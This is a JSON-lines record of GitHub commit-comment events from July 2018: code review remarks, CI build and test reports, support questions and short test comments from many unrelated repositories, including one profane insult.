{"id":"7965015593","type":"CommitCommentEvent","actor":{"login":"djh816"},"repo":{"name":"j0e1in/MasterClassDownloader"},"payload":{"comment":{"id":29707276,"position":null,"line":null,"path":null,"commit_id":"bf55725d27a85b239798ccdd0d21013731451b21","created_at":"2018-07-14T01:51:20Z","updated_at":"2018-07-14T01:51:20Z","author_association":"NONE","body":"typo in print and sleep() should take wait_time :) thanks!"}},"created_at":"2018-07-14T01:51:20Z"}
{"id":"7965016080","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29707278,"position":null,"line":null,"path":null,"commit_id":"6542211581b7d78d50df457238fcb3d0eda2e6d6","created_at":"2018-07-14T01:51:45Z","updated_at":"2018-07-14T01:51:45Z","author_association":"NONE","body":"### Results for event id: 38cd27b2-81a2-45ad-b17b-80f80642865b\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (42476 lines total):**\n\n```\n...\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'safe-json-stringify' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 90:28-58\n @ ./src/index.js\u001b[39m\u001b[22m\nServerless: Zip function: /usr/workspace/clone/packages/sample-http/.build/.webpack/sample-http [98 ms]\nServerless: Packaging service...\nServerless: Remove /usr/workspace/clone/packages/sample-http/.build/.webpack\n \n  Serverless Error ---------------------------------------\n \n  Could not locate deployment bucket. Error: The AWS Access Key Id you provided does not exist in our records.\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nFAILURE:  sample-http\n\nAT LEAST ONE DEPLOYMENT FAILED\nExecution time was 150 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T01:51:45Z"}
{"id":"7965018670","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707286,"position":null,"line":null,"path":null,"commit_id":"f49d9383604b3922f43ded65291539b2cd40fc8e","created_at":"2018-07-14T01:54:03Z","updated_at":"2018-07-14T01:54:03Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-MacOS-10.9-clang: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 625\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f49d9383604b3922f43ded65291539b2cd40fc8e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.13%25-red.png)</a> \n"}},"created_at":"2018-07-14T01:54:03Z"}
{"id":"7965019353","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29707287,"position":33,"line":119,"path":"compile.rkt","commit_id":"1ef47b6768fc2c0d9188e2c1960ab43118fcbe29","created_at":"2018-07-14T01:54:39Z","updated_at":"2018-07-14T01:54:39Z","author_association":"OWNER","body":"You should put this code in something that takes an ExternSrc because they appear in other parts of the tree"}},"created_at":"2018-07-14T01:54:39Z"}
{"id":"7965019463","type":"CommitCommentEvent","actor":{"login":"PalaciosUTH"},"repo":{"name":"PalaciosUTH/JavierPalaciosUTH"},"payload":{"comment":{"id":29707288,"position":null,"line":null,"path":null,"commit_id":"1d1bcd0c371707a05b765cbe87b95359898f0683","created_at":"2018-07-14T01:54:45Z","updated_at":"2018-07-14T01:54:45Z","author_association":"OWNER","body":" \r\n git add ARCHIVOS\r\n git commit -m MENSAJE"}},"created_at":"2018-07-14T01:54:45Z"}
{"id":"7965019673","type":"CommitCommentEvent","actor":{"login":"fxdcsy"},"repo":{"name":"fxdcsy/mytest"},"payload":{"comment":{"id":29707289,"position":1,"line":1,"path":"README.md","commit_id":"943c68ae6a8d28971976d0930c84a5dd95eb8014","created_at":"2018-07-14T01:54:57Z","updated_at":"2018-07-14T01:54:57Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-14T01:54:57Z"}
{"id":"7965019780","type":"CommitCommentEvent","actor":{"login":"PalaciosUTH"},"repo":{"name":"PalaciosUTH/JavierPalaciosUTH"},"payload":{"comment":{"id":29707290,"position":1,"line":1,"path":"README.md","commit_id":"1d1bcd0c371707a05b765cbe87b95359898f0683","created_at":"2018-07-14T01:55:04Z","updated_at":"2018-07-14T01:55:04Z","author_association":"OWNER","body":" \r\n git add ARCHIVOS\r\n git commit -m MENSAJE"}},"created_at":"2018-07-14T01:55:04Z"}
{"id":"7965020001","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29707291,"position":62,"line":213,"path":"compile.rkt","commit_id":"1ef47b6768fc2c0d9188e2c1960ab43118fcbe29","created_at":"2018-07-14T01:55:15Z","updated_at":"2018-07-14T01:55:15Z","author_association":"OWNER","body":"`x` is the name of `f`'s output in this function, not the name of `f`. You need to pick a name for `f`"}},"created_at":"2018-07-14T01:55:15Z"}
{"id":"7965020274","type":"CommitCommentEvent","actor":{"login":"cyberpunk2350"},"repo":{"name":"cyberpunk2350/PowerShell"},"payload":{"comment":{"id":29707292,"position":null,"line":null,"path":null,"commit_id":"75cdc687368dc4c83bb4d8810902ba3bda0c8832","created_at":"2018-07-14T01:55:27Z","updated_at":"2018-07-14T01:55:27Z","author_association":"OWNER","body":"added a new grep like search function"}},"created_at":"2018-07-14T01:55:27Z"}
{"id":"7965020844","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29707294,"position":126,"line":251,"path":"compile.rkt","commit_id":"1ef47b6768fc2c0d9188e2c1960ab43118fcbe29","created_at":"2018-07-14T01:55:59Z","updated_at":"2018-07-14T01:55:59Z","author_association":"OWNER","body":"`n` is supposed to be the public name of the function that the interface requires, you can't change it."}},"created_at":"2018-07-14T01:55:59Z"}
{"id":"7965021637","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29707297,"position":135,"line":260,"path":"compile.rkt","commit_id":"1ef47b6768fc2c0d9188e2c1960ab43118fcbe29","created_at":"2018-07-14T01:56:42Z","updated_at":"2018-07-14T01:56:42Z","author_association":"OWNER","body":"This is wrong because when you compile this function, you may discover more functions to compile"}},"created_at":"2018-07-14T01:56:42Z"}
{"id":"7965021933","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29707298,"position":160,"line":323,"path":"compile.rkt","commit_id":"1ef47b6768fc2c0d9188e2c1960ab43118fcbe29","created_at":"2018-07-14T01:56:58Z","updated_at":"2018-07-14T01:56:58Z","author_association":"OWNER","body":"Don't embed your path"}},"created_at":"2018-07-14T01:56:58Z"}
{"id":"7965023549","type":"CommitCommentEvent","actor":{"login":"mohideenbabu"},"repo":{"name":"nicehash/NiceHashMinerLegacy"},"payload":{"comment":{"id":29707299,"position":null,"line":null,"path":null,"commit_id":"004c8f16b099a943f677699d9cfa6ade3ab29c7c","created_at":"2018-07-14T01:58:04Z","updated_at":"2018-07-14T01:58:04Z","author_association":"NONE","body":"aqa"}},"created_at":"2018-07-14T01:58:04Z"}
{"id":"7965024857","type":"CommitCommentEvent","actor":{"login":"akirak"},"repo":{"name":"alphapapa/helm-org-rifle"},"payload":{"comment":{"id":29707303,"position":null,"line":null,"path":null,"commit_id":"a6324b7f5157e3e91a7993efb87ece6b9ca449a9","created_at":"2018-07-14T01:59:14Z","updated_at":"2018-07-14T01:59:14Z","author_association":"CONTRIBUTOR","body":"I'm sorry for replying to you late. From now on, I have to resettle in Tokyo, so I cannot commit to open-source projects as often as the past few months.\r\n\r\nAs for the new features, I think they are awesome. Actually, I was not sure how helm-org-rifle was matching a query against candidates, so allowing more detailed specification of the matching method is even more than welcome."}},"created_at":"2018-07-14T01:59:14Z"}
{"id":"7965548198","type":"CommitCommentEvent","actor":{"login":"nasarabu"},"repo":{"name":"nasarabu/background-generator"},"payload":{"comment":{"id":29708726,"position":null,"line":null,"path":null,"commit_id":"d09257e679dced67e3feb070e70ab686bc2296b9","created_at":"2018-07-14T10:00:00Z","updated_at":"2018-07-14T10:00:00Z","author_association":"OWNER","body":"need changes"}},"created_at":"2018-07-14T10:00:00Z"}
{"id":"7965548215","type":"CommitCommentEvent","actor":{"login":"noescape00"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29708727,"position":50,"line":145,"path":"src/Stratis.Bitcoin/Base/ConsensusManagerBehavior.cs","commit_id":"a5f00a8d93f29bd75d290edb226a0309fe3aaec8","created_at":"2018-07-14T10:00:00Z","updated_at":"2018-07-14T10:00:00Z","author_association":"CONTRIBUTOR","body":"Reverted"}},"created_at":"2018-07-14T10:00:00Z"}
{"id":"7965548225","type":"CommitCommentEvent","actor":{"login":"FearlessZander"},"repo":{"name":"InitialFail/driftin-bots"},"payload":{"comment":{"id":29708728,"position":null,"line":null,"path":null,"commit_id":"12bfa4aa0dd04d4634687aa8703f777bdc07725e","created_at":"2018-07-14T10:00:01Z","updated_at":"2018-07-14T10:00:01Z","author_association":"NONE","body":"Why only 1 bot? I saw someone did 15 to 20 bots? How can i do that? I recently saw someone did 15 to 20 bots what browser is good to do that much? Not just 1. I tired Chrome it only gives me 1 moving bot not 15 to 20. I am slowly figuring on how to use your bots and i see people doing 15 to 20 bots and i don't know what is a good browser to do it on. "}},"created_at":"2018-07-14T10:00:01Z"}
{"id":"7965548418","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29708732,"position":25,"line":306,"path":"compile.rkt","commit_id":"5cc972db9c57414cc78e828bf7190b5d33958a09","created_at":"2018-07-14T10:00:10Z","updated_at":"2018-07-14T10:00:10Z","author_association":"OWNER","body":"Perhaps we need a `compile-library` when you want `-shared` and `compile-exe` when you don't, that share the same underlying `compile-program` but with this tiny difference"}},"created_at":"2018-07-14T10:00:10Z"}
{"id":"7965550553","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708737,"position":59,"line":52,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T10:01:43Z","updated_at":"2018-07-14T10:01:43Z","author_association":"NONE","body":"![screenshot_1](https://user-images.githubusercontent.com/13052951/42723397-7624548a-8765-11e8-9f1f-0225563d6b0a.png)\r\nв этом месте,  я бы сделала отдельным блоком обёртку для этих двух категорий и отдельным блоком квадрат внутри\r\n\r\nи ещё у тебя `categories__slim` и `categories__pro` - одинаковые и им можно дать один и тот же класс\r\n\r\nвместо `categories__slim` сделать `category` \r\nи вместо  `categories__pro`  сделать `category`\r\n\r\nи внутри соответственно поменять классы внутренних элементов на `category__..`\r\n"}},"created_at":"2018-07-14T10:01:43Z"}
{"id":"7965551069","type":"CommitCommentEvent","actor":{"login":"n18023"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29708738,"position":null,"line":null,"path":null,"commit_id":"4ad3a82a75436861b7a5fd0be57babd923d38356","created_at":"2018-07-14T10:02:11Z","updated_at":"2018-07-14T10:02:11Z","author_association":"OWNER","body":"金城先生\r\n\r\n御忙しい中失礼致します。こちらこそ宜しく御願い致します。\r\n少し今週の課題難し過ぎる様な気がします。泣  平敷大賀\r\n\r\n2018년 7월 14일 (토) 오후 5:53, kinjo-icolle <notifications@github.com>님이 작성:\r\n\r\n> 修正ありがとうございます。結果の文字列の埋め込み、良い感じだと思います。\r\n>\r\n> 先日修正前にしたコメントで、1つ謝罪させてください。\r\n> display()メソッドを使う旨は元々大舛先生からそういう話があったようですね。\r\n> それを知らずに大変失礼しました。\r\n>\r\n>\r\n> 僕自身が大舛先生に比べpythonに対して不勉強な部分が多く、pythonを実装時の最適解がまだまだ良く分かっていない部分があり、時たまこんな風に混乱を招いてしまっている部分があります。\r\n> (教える立場にいてこういうこと言うのも非常にお恥ずかしいですが…)\r\n> 皆さんに教えることを通じてではありますが、僕もまだまだ一緒に勉強させてもらいたいと思っています。\r\n> 今後ともよろしくお付き合いください。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18023/programming-term2/commit/4ad3a82a75436861b7a5fd0be57babd923d38356#commitcomment-29708410>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Alf585PlHApZxA9InJXBUgSEwfSadErYks5uGbGTgaJpZM4VPySh>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-14T10:02:11Z"}
{"id":"7965551750","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29708740,"position":6,"line":253,"path":"compile.rkt","commit_id":"c55014abe1af10cfa4def0c65c1907430e665c20","created_at":"2018-07-14T10:02:49Z","updated_at":"2018-07-14T10:02:49Z","author_association":"OWNER","body":"First, the type should not be `symbol?`, because C identifiers are strings. Second, I don't understand what your question means. The whole point of `n->f` is that these are the /public/ names of the functions. C doesn't have the ability to have different internal and external names of functions, so if a function is public, you had better use that name. All the other ones will get fake names that you'll make up as you find them (btw, you'll also need to add `static` to those definitions, I don't think you have that yet.)"}},"created_at":"2018-07-14T10:02:49Z"}
{"id":"7965553425","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29708743,"position":18,"line":34,"path":"linker.rkt","commit_id":"c55014abe1af10cfa4def0c65c1907430e665c20","created_at":"2018-07-14T10:04:23Z","updated_at":"2018-07-14T10:04:23Z","author_association":"OWNER","body":"This is a tiny nit, but you should get used to using `eprintf` for stuff like this. I got myself into trouble regularly when I had programs where the point was to generate output and I was accidentally changing it with debugging `printf`s"}},"created_at":"2018-07-14T10:04:23Z"}
{"id":"7965553882","type":"CommitCommentEvent","actor":{"login":"Udhayakumar2201"},"repo":{"name":"bareos/bareos-webui"},"payload":{"comment":{"id":29708744,"position":null,"line":null,"path":null,"commit_id":"ee232a6f04eaf2a7c1084fee981f011ede000e8a","created_at":"2018-07-14T10:04:47Z","updated_at":"2018-07-14T10:04:47Z","author_association":"NONE","body":"Hi...\r\n       After modify this file same as Bareos webui Restore tab take too much time for particular client backup.\r\nfor your information that back up file size only 500 MB.\r\nPlease advice me to fix this issue.\r\n\r\nThanks in Advance.\r\nUdhayakumar R "}},"created_at":"2018-07-14T10:04:47Z"}
{"id":"7965553883","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29708745,"position":29,"line":42,"path":"linker.rkt","commit_id":"c55014abe1af10cfa4def0c65c1907430e665c20","created_at":"2018-07-14T10:04:47Z","updated_at":"2018-07-14T10:04:47Z","author_association":"OWNER","body":"Isn't the simplicity of this function beautiful? Good job!"}},"created_at":"2018-07-14T10:04:47Z"}
{"id":"7965554002","type":"CommitCommentEvent","actor":{"login":"paulluger"},"repo":{"name":"TobiHatti/DA-WebSite-BadmintonOOE"},"payload":{"comment":{"id":29708747,"position":null,"line":null,"path":null,"commit_id":"f818647e8e84a262599b83d4a97a6d24528a62fc","created_at":"2018-07-14T10:04:54Z","updated_at":"2018-07-14T10:04:54Z","author_association":"COLLABORATOR","body":"helno"}},"created_at":"2018-07-14T10:04:54Z"}
{"id":"7965554413","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708748,"position":null,"line":null,"path":null,"commit_id":"8b1e5a092fa43a51a252f62cd82ea6373d632421","created_at":"2018-07-14T10:05:16Z","updated_at":"2018-07-14T10:05:16Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Unknown) - i386-Windows-7-VisualStudio-14: OK (3316 of 3316 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T10:05:16Z"}
{"id":"7965554982","type":"CommitCommentEvent","actor":{"login":"azsooner"},"repo":{"name":"fuzzysb/Garadget"},"payload":{"comment":{"id":29708750,"position":null,"line":null,"path":null,"commit_id":"c437c54ffc376f5cd1ad914465c7ba01f6c6ad75","created_at":"2018-07-14T10:05:46Z","updated_at":"2018-07-14T10:05:46Z","author_association":"NONE","body":"I have followed all of the instructions for steps one and two and all seems to be working.  IE I see the Device Handler and Smart App when I look at the tabs.  I have also verified these are installed in the correct URL.   However, when I go to step four and run the smart app in the simulator, I get an authorization error in line 242 running GetDeviceList.  Am I doing something wrong?   I have checked and rechecked that I am using the correct email and password. \r\n\r\n![garadget error](https://user-images.githubusercontent.com/30173588/42723431-855692ae-8712-11e8-8969-213dd04fe182.png)\r\n\r\n Thanks!"}},"created_at":"2018-07-14T10:05:46Z"}
{"id":"7965555039","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"R3x/src"},"payload":{"comment":{"id":29708751,"position":4,"line":37,"path":"sys/sys/kasan.h","commit_id":"878971efb5f9d3dde6172160f2711756161c67ce","created_at":"2018-07-14T10:05:49Z","updated_at":"2018-07-14T10:05:49Z","author_association":"COLLABORATOR","body":"extern"}},"created_at":"2018-07-14T10:05:49Z"}
{"id":"7965556076","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"R3x/src"},"payload":{"comment":{"id":29708752,"position":4,"line":37,"path":"sys/sys/kasan.h","commit_id":"878971efb5f9d3dde6172160f2711756161c67ce","created_at":"2018-07-14T10:06:47Z","updated_at":"2018-07-14T10:06:47Z","author_association":"COLLABORATOR","body":"or rather please move `extern uintptr_t text_start` to kern_asan_init_64.c"}},"created_at":"2018-07-14T10:06:47Z"}
{"id":"7965556584","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29708753,"position":null,"line":null,"path":null,"commit_id":"119065d78c6bc18bac9ec430910cb479c86d79e7","created_at":"2018-07-14T10:07:16Z","updated_at":"2018-07-14T10:07:16Z","author_association":"MEMBER","body":"#1116 #1136"}},"created_at":"2018-07-14T10:07:16Z"}
{"id":"7965558548","type":"CommitCommentEvent","actor":{"login":"cloudsynaptics"},"repo":{"name":"cloudsynaptics/cloudsynaptics.github.io"},"payload":{"comment":{"id":29708759,"position":null,"line":null,"path":null,"commit_id":"d07408c7e5078a7e61a016323dbea9d18b472e2c","created_at":"2018-07-14T10:09:03Z","updated_at":"2018-07-14T10:09:03Z","author_association":"OWNER","body":"restore"}},"created_at":"2018-07-14T10:09:03Z"}
{"id":"7965558859","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708760,"position":86,"line":79,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T10:09:20Z","updated_at":"2018-07-14T10:09:20Z","author_association":"NONE","body":"в блоке `advantages` можно тоже выделить ещё один блок \r\n\r\nто что на картинке сделать `advantage`\r\n![screenshot_2](https://user-images.githubusercontent.com/13052951/42723435-6c95955e-8766-11e8-9435-95f114f1eb27.png)\r\n\r\nпричем можно оставить `advantages-list__item` и добавить дополнительный класс `advantage`\r\n\r\nкласс  `advantages-list__item` показывает, что это элемент блока `advantages` \r\nа класс `advantage` говорит что это ещё и самостоятельный блок\r\n\r\nблок может быть одновременно элементом другого блока\r\n\r\n`advantages-list__text` тогда заменяй на `advantage__text`\r\n\r\nи ещё у всех таких блоков разные фоны(1,2,3,4) и разные иконки\r\nэто можно сделать через дополнительные классы модификаторы\r\nнапример `advantage--leave`, `advantage--water` и тому подобное"}},"created_at":"2018-07-14T10:09:20Z"}
{"id":"7965559035","type":"CommitCommentEvent","actor":{"login":"Legend669"},"repo":{"name":"snlg/tiger"},"payload":{"comment":{"id":29708761,"position":1,"line":1,"path":"README.md","commit_id":"deabf62c08ee876b2d377e97380333414a494c41","created_at":"2018-07-14T10:09:32Z","updated_at":"2018-07-14T10:09:32Z","author_association":"NONE","body":"I don't know who tha fuck u r & I don't give a fuck fuck- boy . So go fuck urself."}},"created_at":"2018-07-14T10:09:32Z"}
{"id":"7965559255","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"R3x/src"},"payload":{"comment":{"id":29708762,"position":14,"line":163,"path":"sys/kern/kern_asan_report.c","commit_id":"878971efb5f9d3dde6172160f2711756161c67ce","created_at":"2018-07-14T10:09:45Z","updated_at":"2018-07-14T10:09:45Z","author_association":"COLLABORATOR","body":"`uintptr_t text_start;`"}},"created_at":"2018-07-14T10:09:45Z"}
{"id":"7965559773","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"R3x/src"},"payload":{"comment":{"id":29708765,"position":14,"line":163,"path":"sys/kern/kern_asan_report.c","commit_id":"878971efb5f9d3dde6172160f2711756161c67ce","created_at":"2018-07-14T10:10:13Z","updated_at":"2018-07-14T10:10:13Z","author_association":"COLLABORATOR","body":"Without extern here."}},"created_at":"2018-07-14T10:10:13Z"}
{"id":"7965561448","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29708766,"position":null,"line":null,"path":null,"commit_id":"aee9b6fb7ef0af9b6e3b668b7a69751314347ddd","created_at":"2018-07-14T10:11:48Z","updated_at":"2018-07-14T10:11:48Z","author_association":"OWNER","body":"OK. It looks like everything is alright."}},"created_at":"2018-07-14T10:11:48Z"}
{"id":"7965562424","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29708767,"position":null,"line":null,"path":null,"commit_id":"3cc0a158cf34bec98de76601db047213c5326eee","created_at":"2018-07-14T10:12:40Z","updated_at":"2018-07-14T10:12:40Z","author_association":"MEMBER","body":"#1129 #1137"}},"created_at":"2018-07-14T10:12:40Z"}
{"id":"7965564716","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29708772,"position":6,"line":39,"path":"src/main/java/ch/njol/skript/effects/EffMakeFly.java","commit_id":"880e3de132ab0f6eb24d10819118f037a1b906de","created_at":"2018-07-14T10:14:50Z","updated_at":"2018-07-14T10:14:50Z","author_association":"CONTRIBUTOR","body":"Not descriptive\r\n```\r\nPlease note that this will also enable player's <a href='expressions.html#ExprFlightMode'>flight mode</a> before forcing to fly.\r\n```\r\n"}},"created_at":"2018-07-14T10:14:50Z"}
{"id":"7965564728","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708773,"position":115,"line":108,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T10:14:50Z","updated_at":"2018-07-14T10:14:50Z","author_association":"NONE","body":"блок `result`\r\n\r\nчтобы понять как делать в нём разметку лучше смотреть начиная с мобильной версии\r\n![screenshot_1](https://user-images.githubusercontent.com/13052951/42723502-85b8e526-8767-11e8-9c55-b47b5385f6d4.png)\r\n\r\nпока лучше убирай лишние обёртки `result-header` и `result__wrapper`, если они понадобятся всегда можно потом добавить, сначала лучше по минимуму самое необходимое добавлять\r\n\r\nа потом уже мы добавим флексы и  хитрые фоны, которые помогут  дойти до отображения десктопной версии\r\n"}},"created_at":"2018-07-14T10:14:50Z"}
{"id":"7965565439","type":"CommitCommentEvent","actor":{"login":"heus92"},"repo":{"name":"Rapacademix/redbull"},"payload":{"comment":{"id":29708777,"position":29,"line":29,"path":"scrapper/management/commands/is_rapper.py","commit_id":"bd2b97856d7ff047e4e7b4d12a7e2341709284bc","created_at":"2018-07-14T10:15:25Z","updated_at":"2018-07-14T10:15:25Z","author_association":"MEMBER","body":"If the length of the list is `>1` then there has been at least one match of a rap vocab word, meaning that the first `None` default value has no interest at all and should stand here only if there are no matches"}},"created_at":"2018-07-14T10:15:25Z"}
{"id":"7965566858","type":"CommitCommentEvent","actor":{"login":"m-bosch"},"repo":{"name":"MultiPoolMiner/MultiPoolMiner"},"payload":{"comment":{"id":29708782,"position":23,"line":557,"path":"README.txt","commit_id":"120e07edb13331ba3360ac34d09b54443d3ae45d","created_at":"2018-07-14T10:16:34Z","updated_at":"2018-07-14T10:16:34Z","author_association":"CONTRIBUTOR","body":"This doesn't work yet. Perhaps the API / web interface need to be modified as well. @grantemsley @UselessGuru "}},"created_at":"2018-07-14T10:16:34Z"}
{"id":"7965566991","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708783,"position":126,"line":119,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T10:16:41Z","updated_at":"2018-07-14T10:16:41Z","author_association":"NONE","body":"после `contact-header` нужно добавить карту ещё\r\nпока просто картинкой"}},"created_at":"2018-07-14T10:16:41Z"}
{"id":"7965567659","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29708787,"position":null,"line":null,"path":null,"commit_id":"52cc2d2ba2eb92a02697812846b1b2555876d69b","created_at":"2018-07-14T10:17:13Z","updated_at":"2018-07-14T10:17:13Z","author_association":"MEMBER","body":"`Backport-PR-URL` is incorrect, it should have been https://github.com/nodejs/node/pull/21734"}},"created_at":"2018-07-14T10:17:13Z"}
{"id":"7965568693","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29708788,"position":null,"line":null,"path":null,"commit_id":"6649f209f2211e50bce440b7cdeb57c0306f80c8","created_at":"2018-07-14T10:18:14Z","updated_at":"2018-07-14T10:18:14Z","author_association":"MEMBER","body":"#1125"}},"created_at":"2018-07-14T10:18:14Z"}
{"id":"7965568891","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708789,"position":126,"line":119,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T10:18:25Z","updated_at":"2018-07-14T10:18:25Z","author_association":"NONE","body":"у тебя получилось, что `contact-header` отдельный блок\r\n\r\nлучше пусть будет элементом блока `contact`\r\n\r\nто есть `contact-header` преврати в `contact__header`\r\nи всё что внутри него тоже пусть будут элементы блока `contact`"}},"created_at":"2018-07-14T10:18:25Z"}
{"id":"7965569420","type":"CommitCommentEvent","actor":{"login":"heus92"},"repo":{"name":"Rapacademix/redbull"},"payload":{"comment":{"id":29708790,"position":null,"line":null,"path":null,"commit_id":"bd2b97856d7ff047e4e7b4d12a7e2341709284bc","created_at":"2018-07-14T10:18:56Z","updated_at":"2018-07-14T10:18:56Z","author_association":"MEMBER","body":"- `is_rapper.py` file has been removed\r\n- waiting for dev DB to be created to test the script\r\n- logic-wise I sincerely don't know what's best here where to keep the logic and data processing. Let me know which best practice/guideline you'd want me to follow 🙏 "}},"created_at":"2018-07-14T10:18:56Z"}
{"id":"7965569577","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29708792,"position":2,"line":2,"path":"BankManagement/BankManagement/Bank.c","commit_id":"bbba2d2e7a3c4020cc679e71dd960f60a6c1d65f","created_at":"2018-07-14T10:19:05Z","updated_at":"2018-07-14T10:19:05Z","author_association":"NONE","body":"bad. remove your comments "}},"created_at":"2018-07-14T10:19:05Z"}
{"id":"7965569621","type":"CommitCommentEvent","actor":{"login":"DavisVaughan"},"repo":{"name":"sboysel/fredr"},"payload":{"comment":{"id":29708793,"position":null,"line":null,"path":null,"commit_id":"72e5ddd7fcbd62578c360b5f435ecfcc6b789748","created_at":"2018-07-14T10:19:06Z","updated_at":"2018-07-14T10:19:06Z","author_association":"COLLABORATOR","body":"Woah this is so clever"}},"created_at":"2018-07-14T10:19:06Z"}
